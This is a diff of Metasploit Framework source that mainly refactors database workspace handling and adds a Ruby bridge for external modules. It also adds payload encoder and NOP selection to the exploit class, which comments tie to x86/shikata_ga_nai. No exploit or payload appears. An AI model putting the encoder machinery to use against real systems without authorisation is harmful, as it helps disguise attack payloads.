wspace = find_workspace(wspace)
|
||||
end
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
seen = opts.delete(:seen) || false
|
||||
crit = opts.delete(:critical) || false
|
||||
host = nil
|
||||
|
@ -110,13 +117,7 @@ module Msf::DBManager::Note
|
|||
elsif opts[:service] and opts[:service].kind_of? ::Mdm::Service
|
||||
service = opts[:service]
|
||||
end
|
||||
=begin
|
||||
if host
|
||||
host.updated_at = host.created_at
|
||||
host.state = HostState::Alive
|
||||
host.save!
|
||||
end
|
||||
=end
|
||||
|
||||
ntype = opts.delete(:type) || opts.delete(:ntype) || (raise RuntimeError, "A note :type or :ntype is required")
|
||||
data = opts[:data]
|
||||
note = nil
|
||||
|
@ -171,4 +172,42 @@ module Msf::DBManager::Note
|
|||
ret[:note] = note
|
||||
}
|
||||
end
|
||||
|
||||
# Update the attributes of a note entry with the values in opts.
|
||||
# The values in opts should match the attributes to update.
|
||||
#
|
||||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||
# @return [Mdm::Note] The updated Mdm::Note object.
|
||||
def update_note(opts)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||
opts[:workspace] = wspace if wspace
|
||||
|
||||
id = opts.delete(:id)
|
||||
Mdm::Note.update(id, opts)
|
||||
}
|
||||
end
|
||||
|
||||
# Deletes note entries based on the IDs passed in.
|
||||
#
|
||||
# @param opts[:ids] [Array] Array containing Integers corresponding to the IDs of the note entries to delete.
|
||||
# @return [Array] Array containing the Mdm::Note objects that were successfully deleted.
|
||||
def delete_note(opts)
|
||||
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
deleted = []
|
||||
opts[:ids].each do |note_id|
|
||||
note = Mdm::Note.find(note_id)
|
||||
begin
|
||||
deleted << note.destroy
|
||||
rescue # refs suck
|
||||
elog("Forcibly deleting #{note}")
|
||||
deleted << note.delete
|
||||
end
|
||||
end
|
||||
|
||||
return deleted
|
||||
}
|
||||
end
|
||||
end
|
||||
|
|
|
@ -78,7 +78,7 @@ module Msf::DBManager::Report
|
|||
#
|
||||
# This methods returns a list of all reports in the database
|
||||
#
|
||||
def reports(wspace=workspace)
|
||||
def reports(wspace=framework.db.workspace)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.reports
|
||||
}
|
||||
|
|
|
@ -21,9 +21,9 @@ module Msf::DBManager::Service
|
|||
|
||||
# Iterates over the services table calling the supplied block with the
|
||||
# service instance of each entry.
|
||||
def each_service(wspace=workspace, &block)
|
||||
def each_service(wspace=framework.db.workspace, &block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
services(wspace).each do |service|
|
||||
wspace.services.each do |service|
|
||||
block.call(service)
|
||||
end
|
||||
}
|
||||
|
@ -61,7 +61,7 @@ module Msf::DBManager::Service
|
|||
hname = opts.delete(:host_name)
|
||||
hmac = opts.delete(:mac)
|
||||
host = nil
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
hopts = {:workspace => wspace, :host => addr}
|
||||
hopts[:name] = hname if hname
|
||||
hopts[:mac] = hmac if hmac
|
||||
|
@ -141,7 +141,8 @@ module Msf::DBManager::Service
|
|||
|
||||
# Returns a list of all services in the database
|
||||
def services(opts)
|
||||
opts.delete(:workspace) # Mdm::Service apparently doesn't have an upstream Mdm::Workspace association
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
search_term = opts.delete(:search_term)
|
||||
opts["hosts.address"] = opts.delete(:addresses)
|
||||
opts.compact!
|
||||
|
@ -149,9 +150,9 @@ module Msf::DBManager::Service
|
|||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
if search_term && !search_term.empty?
|
||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Service, search_term)
|
||||
Mdm::Service.includes(:host).where(opts).where(column_search_conditions).order("hosts.address, port")
|
||||
wspace.services.includes(:host).where(opts).where(column_search_conditions).order("hosts.address, port")
|
||||
else
|
||||
Mdm::Service.includes(:host).where(opts).order("hosts.address, port")
|
||||
wspace.services.includes(:host).where(opts).order("hosts.address, port")
|
||||
end
|
||||
}
|
||||
end
|
||||
|
|
|
@ -13,7 +13,7 @@ module Msf::DBManager::Session
|
|||
def get_session(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
addr = opts[:addr] || opts[:address] || opts[:host] || return
|
||||
host = get_host(:workspace => wspace, :host => addr)
|
||||
time = opts[:opened_at] || opts[:created_at] || opts[:time] || return
|
||||
|
@ -119,12 +119,12 @@ module Msf::DBManager::Session
|
|||
return if not active
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
workspace = find_workspace(session_dto[:workspace])
|
||||
host_data = session_dto[:host_data]
|
||||
workspace = workspaces({ name: host_data[:workspace] })
|
||||
h_opts = {}
|
||||
h_opts[:host] = host_data[:host]
|
||||
h_opts[:arch] = host_data[:arch]
|
||||
h_opts[:workspace] = workspace
|
||||
h_opts[:workspace] = host_data[:workspace]
|
||||
host = find_or_create_host(h_opts)
|
||||
|
||||
session_data = session_dto[:session_data]
|
||||
|
|
|
@ -1,11 +1,6 @@
|
|||
module Msf::DBManager::SessionEvent
|
||||
|
||||
def session_events(opts)
|
||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
conditions = {}
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ module Msf::DBManager::Task
|
|||
def report_task(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
path = opts.delete(:path) || (raise RuntimeError, "A task :path is required")
|
||||
|
||||
ret = {}
|
||||
|
@ -49,7 +49,7 @@ module Msf::DBManager::Task
|
|||
#
|
||||
# This methods returns a list of all tasks in the database
|
||||
#
|
||||
def tasks(wspace=workspace)
|
||||
def tasks(wspace=framework.db.workspace)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.tasks
|
||||
}
|
||||
|
|
|
@ -3,7 +3,7 @@ module Msf::DBManager::Vuln
|
|||
# This method iterates the vulns table calling the supplied block with the
|
||||
# vuln instance of each entry.
|
||||
#
|
||||
def each_vuln(wspace=workspace,&block)
|
||||
def each_vuln(wspace=framework.db.workspace, &block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.vulns.each do |vulns|
|
||||
block.call(vulns)
|
||||
|
@ -94,8 +94,7 @@ module Msf::DBManager::Vuln
|
|||
info = opts[:info]
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
exploited_at = opts[:exploited_at] || opts["exploited_at"]
|
||||
details = opts.delete(:details)
|
||||
rids = opts.delete(:ref_ids)
|
||||
|
@ -236,12 +235,8 @@ module Msf::DBManager::Vuln
|
|||
# This methods returns a list of all vulnerabilities in the database
|
||||
#
|
||||
def vulns(opts)
|
||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
search_term = opts.delete(:search_term)
|
||||
if search_term && !search_term.empty?
|
||||
|
@ -259,17 +254,12 @@ module Msf::DBManager::Vuln
|
|||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||
# @return [Mdm::Vuln] The updated Mdm::Vuln object.
|
||||
def update_vuln(opts)
|
||||
# process workspace string for update if included in opts
|
||||
wspace = opts.delete(:workspace)
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
opts[:workspace] = wspace
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
id = opts.delete(:id)
|
||||
Mdm::Vuln.update(id, opts)
|
||||
}
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||
opts[:workspace] = wspace if wspace
|
||||
id = opts.delete(:id)
|
||||
Mdm::Vuln.update(id, opts)
|
||||
}
|
||||
end
|
||||
|
||||
# Deletes Vuln entries based on the IDs passed in.
|
||||
|
@ -279,19 +269,19 @@ module Msf::DBManager::Vuln
|
|||
def delete_vuln(opts)
|
||||
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
deleted = []
|
||||
opts[:ids].each do |vuln_id|
|
||||
vuln = Mdm::Vuln.find(vuln_id)
|
||||
begin
|
||||
deleted << vuln.destroy
|
||||
rescue # refs suck
|
||||
elog("Forcibly deleting #{vuln}")
|
||||
deleted << vuln.delete
|
||||
end
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
deleted = []
|
||||
opts[:ids].each do |vuln_id|
|
||||
vuln = Mdm::Vuln.find(vuln_id)
|
||||
begin
|
||||
deleted << vuln.destroy
|
||||
rescue # refs suck
|
||||
elog("Forcibly deleting #{vuln}")
|
||||
deleted << vuln.delete
|
||||
end
|
||||
end
|
||||
|
||||
return deleted
|
||||
}
|
||||
return deleted
|
||||
}
|
||||
end
|
||||
end
|
||||
|
|
|
@ -22,20 +22,17 @@ module Msf::DBManager::VulnAttempt
|
|||
# This methods returns a list of all vulnerability attempts in the database
|
||||
#
|
||||
def vuln_attempts(opts)
|
||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
# 'workspace' is not a valid attribute for Mdm::VulnAttempt. Remove it.
|
||||
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||
|
||||
search_term = opts.delete(:search_term)
|
||||
if search_term && !search_term.empty?
|
||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::VulnAttempt, search_term)
|
||||
Mdm::VulnAttempt.where(opts).where(column_search_conditions)
|
||||
else
|
||||
Mdm::VulnAttempt.where(opts)
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
|
||||
search_term = opts.delete(:search_term)
|
||||
if search_term && !search_term.empty?
|
||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::VulnAttempt, search_term)
|
||||
Mdm::VulnAttempt.where(opts).where(column_search_conditions)
|
||||
else
|
||||
Mdm::VulnAttempt.where(opts)
|
||||
end
|
||||
}
|
||||
}
|
||||
end
|
||||
end
|
|
@ -20,7 +20,7 @@ module Msf::DBManager::Web
|
|||
def report_web_form(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
path = opts[:path]
|
||||
meth = opts[:method].to_s.upcase
|
||||
|
@ -107,7 +107,7 @@ module Msf::DBManager::Web
|
|||
def report_web_page(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
path = opts[:path]
|
||||
code = opts[:code].to_i
|
||||
|
@ -188,7 +188,7 @@ module Msf::DBManager::Web
|
|||
def report_web_site(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection { |conn|
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
vhost = opts.delete(:vhost)
|
||||
|
||||
addr = nil
|
||||
|
@ -289,7 +289,7 @@ module Msf::DBManager::Web
|
|||
def report_web_vuln(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
path = opts[:path]
|
||||
meth = opts[:method]
|
||||
|
|
|
@ -1,17 +1,24 @@
|
|||
module Msf::DBManager::Workspace
|
||||
|
||||
DEFAULT_WORKSPACE_NAME = 'default'
|
||||
#
|
||||
# Creates a new workspace in the database
|
||||
#
|
||||
def add_workspace(name)
|
||||
def add_workspace(opts)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
::Mdm::Workspace.where(name: name).first_or_create
|
||||
::Mdm::Workspace.where(name: opts[:name]).first_or_create
|
||||
}
|
||||
end
|
||||
|
||||
def default_workspace
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
::Mdm::Workspace.default
|
||||
}
|
||||
# Workspace tracking is handled on the client side, so attempting to call it directly from the DbManager
|
||||
# will not return the correct results. Run it back through the proxy.
|
||||
|
||||
|
||||
wlog "[DEPRECATION] Setting the workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||
|
||||
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||
framework.db.default_workspace
|
||||
end
|
||||
|
||||
def find_workspace(name)
|
||||
|
@ -21,102 +28,75 @@ module Msf::DBManager::Workspace
|
|||
end
|
||||
|
||||
def workspace
|
||||
framework.db.find_workspace(@workspace_name)
|
||||
# The @current_workspace is tracked on the client side, so attempting to call it directly from the DbManager
|
||||
# will not return the correct results. Run it back through the proxy.
|
||||
wlog "[DEPRECATION] Calling workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||
|
||||
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||
framework.db.workspace
|
||||
end
|
||||
|
||||
def workspace=(workspace)
|
||||
@workspace_name = workspace.name
|
||||
# The @current_workspace is tracked on the client side, so attempting to call it directly from the DbManager
|
||||
# will not return the correct results. Run it back through the proxy.
|
||||
wlog "[DEPRECATION] Setting the workspace from within DbManager is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||
|
||||
# Proxied to fix tests, will be cleaned up in remote test patch
|
||||
framework.db.workspace=workspace
|
||||
end
|
||||
|
||||
def workspaces
|
||||
def workspaces(opts = {})
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
::Mdm::Workspace.order('updated_at asc').load
|
||||
search_term = opts.delete(:search_term)
|
||||
# Passing these values to the search will cause exceptions, so remove them if they accidentally got passed in.
|
||||
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
if search_term && !search_term.empty?
|
||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Workspace, search_term)
|
||||
Mdm::Workspace.where(opts).where(column_search_conditions)
|
||||
else
|
||||
Mdm::Workspace.where(opts)
|
||||
end
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an array of all the associated workspace records counts.
|
||||
#
|
||||
def workspace_associations_counts()
|
||||
results = Array.new()
|
||||
def delete_workspaces(opts)
|
||||
raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
deleted = []
|
||||
default_deleted = false
|
||||
opts[:ids].each do |ws_id|
|
||||
ws = Mdm::Workspace.find(ws_id)
|
||||
default_deleted = true if ws.default?
|
||||
begin
|
||||
deleted << ws.destroy
|
||||
if default_deleted
|
||||
add_workspace({ name: DEFAULT_WORKSPACE_NAME })
|
||||
default_deleted = false
|
||||
end
|
||||
rescue
|
||||
elog("Forcibly deleting #{ws.name}")
|
||||
deleted << ws.delete
|
||||
end
|
||||
end
|
||||
|
||||
return deleted
|
||||
}
|
||||
end
|
||||
|
||||
def update_workspace(opts)
|
||||
raise ArgumentError.new("The following options are required: :id") if opts[:id].nil?
|
||||
Msf::Util::DBManager.delete_opts_workspace(opts)
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
workspaces.each do |ws|
|
||||
results << {
|
||||
:name => ws.name,
|
||||
:hosts_count => ws.hosts.count,
|
||||
:services_count => ws.services.count,
|
||||
:vulns_count => ws.vulns.count,
|
||||
:creds_count => ws.core_credentials.count,
|
||||
:loots_count => ws.loots.count,
|
||||
:notes_count => ws.notes.count
|
||||
}
|
||||
end
|
||||
ws_to_update = workspaces({ id: opts.delete(:id) }).first
|
||||
default_renamed = true if ws_to_update.name == DEFAULT_WORKSPACE_NAME
|
||||
updated_ws = Mdm::Workspace.update(ws_to_update.id, opts)
|
||||
add_workspace({ name: DEFAULT_WORKSPACE_NAME }) if default_renamed
|
||||
updated_ws
|
||||
}
|
||||
|
||||
return results
|
||||
end
|
||||
|
||||
def delete_all_workspaces()
|
||||
return delete_workspaces(workspaces.map(&:name))
|
||||
end
|
||||
|
||||
def delete_workspaces(names)
|
||||
status_msg = []
|
||||
error_msg = []
|
||||
|
||||
switched = false
|
||||
# Delete workspaces
|
||||
names.each do |name|
|
||||
workspace = framework.db.find_workspace(name)
|
||||
if workspace.nil?
|
||||
error << "Workspace not found: #{name}"
|
||||
elsif workspace.default?
|
||||
workspace.destroy
|
||||
workspace = framework.db.add_workspace(name)
|
||||
status_msg << 'Deleted and recreated the default workspace'
|
||||
else
|
||||
# switch to the default workspace if we're about to delete the current one
|
||||
if framework.db.workspace.name == workspace.name
|
||||
framework.db.workspace = framework.db.default_workspace
|
||||
switched = true
|
||||
end
|
||||
# now destroy the named workspace
|
||||
workspace.destroy
|
||||
status_msg << "Deleted workspace: #{name}"
|
||||
end
|
||||
end
|
||||
(status_msg << "Switched workspace: #{framework.db.workspace.name}") if switched
|
||||
return status_msg, error_msg
|
||||
end
|
||||
|
||||
#
|
||||
# Renames a workspace
|
||||
#
|
||||
def rename_workspace(from_name, to_name)
|
||||
raise "Workspace exists: #{to_name}" if framework.db.find_workspace(to_name)
|
||||
|
||||
workspace = find_workspace(from_name)
|
||||
raise "Workspace not found: #{name}" if workspace.nil?
|
||||
|
||||
workspace.name = new
|
||||
workspace.save!
|
||||
|
||||
# Recreate the default workspace to avoid errors
|
||||
if workspace.default?
|
||||
framework.db.add_workspace(from_name)
|
||||
#print_status("Recreated default workspace after rename")
|
||||
end
|
||||
|
||||
# Switch to new workspace if old name was active
|
||||
if (@workspace_name == workspace.name)
|
||||
framework.db.workspace = workspace
|
||||
#print_status("Switched workspace: #{framework.db.workspace.name}")
|
||||
end
|
||||
end
|
||||
|
||||
def get_workspace(opts)
|
||||
workspace = opts.delete(:wspace) || opts.delete(:workspace) || workspace
|
||||
find_workspace(workspace) if (workspace.is_a?(String))
|
||||
end
|
||||
end
|
||||
|
|
|
@ -550,8 +550,8 @@ class Exploit < Msf::Module
|
|||
reqs['AppendEncoder'] = payload_append_encoder(explicit_target)
|
||||
reqs['MaxNops'] = payload_max_nops(explicit_target)
|
||||
reqs['MinNops'] = payload_min_nops(explicit_target)
|
||||
reqs['Encoder'] = datastore['ENCODER']
|
||||
reqs['Nop'] = datastore['NOP']
|
||||
reqs['Encoder'] = datastore['ENCODER'] || payload_encoder(explicit_target)
|
||||
reqs['Nop'] = datastore['NOP'] || payload_nop(explicit_target)
|
||||
reqs['EncoderType'] = payload_encoder_type(explicit_target)
|
||||
reqs['EncoderOptions'] = payload_encoder_options(explicit_target)
|
||||
reqs['ExtendedOptions'] = payload_extended_options(explicit_target)
|
||||
|
@ -597,41 +597,6 @@ class Exploit < Msf::Module
|
|||
encoded
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Feature detection
|
||||
#
|
||||
# These methods check to see if there is a derived implementation of
|
||||
# various methods as a way of inferring whether or not a given exploit
|
||||
# supports the feature.
|
||||
#
|
||||
##
|
||||
|
||||
#
|
||||
# Returns true if the exploit module supports the check method.
|
||||
#
|
||||
def supports_check?
|
||||
derived_implementor?(Msf::Exploit, 'check')
|
||||
end
|
||||
|
||||
#
|
||||
# Returns true if the exploit module supports the exploit method.
|
||||
#
|
||||
def supports_exploit?
|
||||
derived_implementor?(Msf::Exploit, 'exploit')
|
||||
end
|
||||
|
||||
#
|
||||
# Returns a hash of the capabilities this exploit module has support for,
|
||||
# such as whether or not it supports check and exploit.
|
||||
#
|
||||
def capabilities
|
||||
{
|
||||
'check' => supports_check?,
|
||||
'exploit' => supports_exploit?
|
||||
}
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Getters/Setters
|
||||
|
@ -676,10 +641,10 @@ class Exploit < Msf::Module
|
|||
end
|
||||
|
||||
#
|
||||
# Returns if the exploit has a passive stance.
|
||||
# Returns if the exploit has a passive stance. Aggressive exploits are always aggressive.
|
||||
#
|
||||
def passive?
|
||||
stance.include?(Stance::Passive)
|
||||
stance.include?(Stance::Passive) && !stance.include?(Stance::Aggressive)
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -951,9 +916,37 @@ class Exploit < Msf::Module
|
|||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the payload encoder that is associated with either the
|
||||
# current target or the exploit in general.
|
||||
#
|
||||
def payload_encoder(explicit_target = nil)
|
||||
explicit_target ||= target
|
||||
|
||||
if (explicit_target and explicit_target.payload_encoder)
|
||||
explicit_target.payload_encoder
|
||||
else
|
||||
payload_info['Encoder']
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the payload NOP generator that is associated with either the
|
||||
# current target or the exploit in general.
|
||||
#
|
||||
def payload_nop(explicit_target = nil)
|
||||
explicit_target ||= target
|
||||
|
||||
if (explicit_target and explicit_target.payload_nop)
|
||||
explicit_target.payload_nop
|
||||
else
|
||||
payload_info['Nop']
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the payload encoder type that is associated with either the
|
||||
# current target of the exploit in general.
|
||||
# current target or the exploit in general.
|
||||
#
|
||||
def payload_encoder_type(explicit_target = nil)
|
||||
explicit_target ||= target
|
||||
|
|
|
@ -137,7 +137,7 @@ module Exploit::CmdStager
|
|||
raise ArgumentError, 'The command stager could not be generated'
|
||||
end
|
||||
|
||||
vprint_status("Generated command stager: #{cmd_list.join}")
|
||||
vprint_status("Generated command stager: #{cmd_list.inspect}")
|
||||
|
||||
cmd_list
|
||||
end
|
||||
|
|
|
@ -131,7 +131,7 @@ class ExploitDriver
|
|||
|
||||
# If we are being instructed to run as a job then let's create that job
|
||||
# like a good person.
|
||||
if (use_job or exploit.stance == Msf::Exploit::Stance::Passive)
|
||||
if (use_job or exploit.passive?)
|
||||
# Since references to the exploit and payload will hang around for
|
||||
# awhile in the job, make sure we copy them so further changes to
|
||||
# the datastore don't alter settings in existing jobs
|
||||
|
|
|
@ -272,10 +272,12 @@ protected
|
|||
private
|
||||
|
||||
def get_db
|
||||
if !options['DisableDatabase']
|
||||
unless options['DisableDatabase']
|
||||
db_manager = Msf::DBManager.new(self)
|
||||
db_manager.init_db(options)
|
||||
options[:db_manager] = db_manager
|
||||
unless options['SkipDatabaseInit']
|
||||
db_manager.init_db(options)
|
||||
end
|
||||
end
|
||||
|
||||
Metasploit::Framework::DataService::DataProxy.new(options)
|
||||
|
|
|
@ -359,15 +359,6 @@ class Module
|
|||
self.module_store = {}
|
||||
end
|
||||
|
||||
#
|
||||
# Checks to see if a derived instance of a given module implements a method
|
||||
# beyond the one that is provided by a base class. This is a pretty lame
|
||||
# way of doing it, but I couldn't find a better one, so meh.
|
||||
#
|
||||
def derived_implementor?(parent, method_name)
|
||||
(self.method(method_name).to_s.match(/#{parent}[^:]/)) ? false : true
|
||||
end
|
||||
|
||||
attr_writer :platform, :references # :nodoc:
|
||||
attr_writer :privileged # :nodoc:
|
||||
attr_writer :license # :nodoc:
|
||||
|
|
|
@ -233,6 +233,22 @@ class Msf::Module::Target
|
|||
opts['Payload'] ? opts['Payload']['Space'] : nil
|
||||
end
|
||||
|
||||
#
|
||||
# The payload encoder or encoders that can be used when generating the
|
||||
# encoded payload (such as x86/shikata_ga_nai and so on).
|
||||
#
|
||||
def payload_encoder
|
||||
opts['Payload'] ? opts['Payload']['Encoder'] : nil
|
||||
end
|
||||
|
||||
#
|
||||
# The payload NOP generator or generators that can be used when generating the
|
||||
# encoded payload (such as x86/opty2 and so on).
|
||||
#
|
||||
def payload_nop
|
||||
opts['Payload'] ? opts['Payload']['Nop'] : nil
|
||||
end
|
||||
|
||||
#
|
||||
# The payload encoder type or types that can be used when generating the
|
||||
# encoded payload (such as alphanum, unicode, xor, and so on).
|
||||
|
|
|
@ -42,7 +42,7 @@ class Msf::Modules::External::Bridge
|
|||
self.env = {}
|
||||
self.running = false
|
||||
self.path = module_path
|
||||
self.cmd = [self.path, self.path]
|
||||
self.cmd = [[self.path, self.path]]
|
||||
self.messages = Queue.new
|
||||
self.buf = ''
|
||||
end
|
||||
|
@ -66,7 +66,7 @@ class Msf::Modules::External::Bridge
|
|||
end
|
||||
|
||||
def send(message)
|
||||
input, output, err, status = ::Open3.popen3(self.env, self.cmd)
|
||||
input, output, err, status = ::Open3.popen3(self.env, *self.cmd)
|
||||
self.ios = [input, output, err]
|
||||
self.wait_thread = status
|
||||
# We would call Rex::Threadsafe directly, but that would require rex for standalone use
|
||||
|
@ -148,7 +148,7 @@ class Msf::Modules::External::Bridge
|
|||
# We are filtering for a response to a particular message, but we got
|
||||
# something else, store the message and try again
|
||||
self.messages.push m
|
||||
read_json(filter_id, timeout)
|
||||
recv(filter_id, timeout)
|
||||
else
|
||||
# Either we weren't filtering, or we got what we were looking for
|
||||
m
|
||||
|
@ -179,10 +179,24 @@ class Msf::Modules::External::PyBridge < Msf::Modules::External::Bridge
|
|||
end
|
||||
end
|
||||
|
||||
class Msf::Modules::External::RbBridge < Msf::Modules::External::Bridge
|
||||
def self.applies?(module_name)
|
||||
module_name.match? /\.rb$/
|
||||
end
|
||||
|
||||
def initialize(module_path)
|
||||
super
|
||||
|
||||
ruby_path = File.expand_path('../ruby', __FILE__)
|
||||
self.cmd = [[Gem.ruby, 'ruby'], "-I#{ruby_path}", self.path]
|
||||
end
|
||||
end
|
||||
|
||||
class Msf::Modules::External::Bridge
|
||||
|
||||
LOADERS = [
|
||||
Msf::Modules::External::PyBridge,
|
||||
Msf::Modules::External::RbBridge,
|
||||
Msf::Modules::External::Bridge
|
||||
]
|
||||
|
||||
|
|
|
@ -14,9 +14,9 @@ class Msf::Modules::External::Message
|
|||
m = self.new(j['method'].to_sym)
|
||||
m.params = j['params']
|
||||
m
|
||||
elsif j['response']
|
||||
elsif j['result']
|
||||
m = self.new(:reply)
|
||||
m.params = j['response']
|
||||
m.params = j['result']
|
||||
m.id = j['id']
|
||||
m
|
||||
end
|
||||
|
|
|
@ -66,11 +66,11 @@ def report_vuln(ip, name, **opts):
|
|||
def run(metadata, module_callback):
|
||||
req = json.loads(os.read(0, 10000).decode("utf-8"))
|
||||
if req['method'] == 'describe':
|
||||
rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})
|
||||
rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'result': metadata})
|
||||
elif req['method'] == 'run':
|
||||
args = req['params']
|
||||
module_callback(args)
|
||||
rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': {
|
||||
rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'result': {
|
||||
'message': 'Module completed'
|
||||
}})
|
||||
|
||||
|
|
|
@ -0,0 +1,58 @@
|
|||
require 'json'
|
||||
|
||||
module Metasploit
|
||||
class << self
|
||||
attr_accessor :logging_prefix
|
||||
|
||||
def log(message, level: 'debug')
|
||||
rpc_send({
|
||||
jsonrpc: '2.0', method: 'message', params: {
|
||||
level: level,
|
||||
message: self.logging_prefix + message
|
||||
}
|
||||
})
|
||||
end
|
||||
|
||||
def report_host(ip, **opts)
|
||||
report(:host, opts.merge(host: ip))
|
||||
end
|
||||
|
||||
def report_service(ip, **opts)
|
||||
report(:service, opts.merge(host: ip))
|
||||
end
|
||||
|
||||
def report_vuln(ip, name, **opts)
|
||||
report(:vuln, opts.merge(host: ip, name: name))
|
||||
end
|
||||
|
||||
def run(metadata, callback)
|
||||
self.logging_prefix = ''
|
||||
req = JSON.parse($stdin.readpartial(10000), symbolize_names: true)
|
||||
if req[:method] == 'describe'
|
||||
rpc_send({
|
||||
jsonrpc: '2.0', id: req[:id], result: metadata
|
||||
})
|
||||
elsif req[:method] == 'run'
|
||||
callback.call req[:params]
|
||||
rpc_send({
|
||||
jsonrpc: '2.0', id: req[:id], result: {
|
||||
message: 'Module completed'
|
||||
}
|
||||
})
|
||||
end
|
||||
end
|
||||
|
||||
def report(kind, data)
|
||||
rpc_send({
|
||||
jsonrpc: '2.0', method: 'report', params: {
|
||||
type: kind, data: data
|
||||
}
|
||||
})
|
||||
end
|
||||
|
||||
def rpc_send(req)
|
||||
puts JSON.generate(req)
|
||||
$stdout.flush
|
||||
end
|
||||
end
|
||||
end
|
|
@ -37,6 +37,7 @@ class Msf::Modules::External::Shim
|
|||
meta[:name] = mod.meta['name'].dump
|
||||
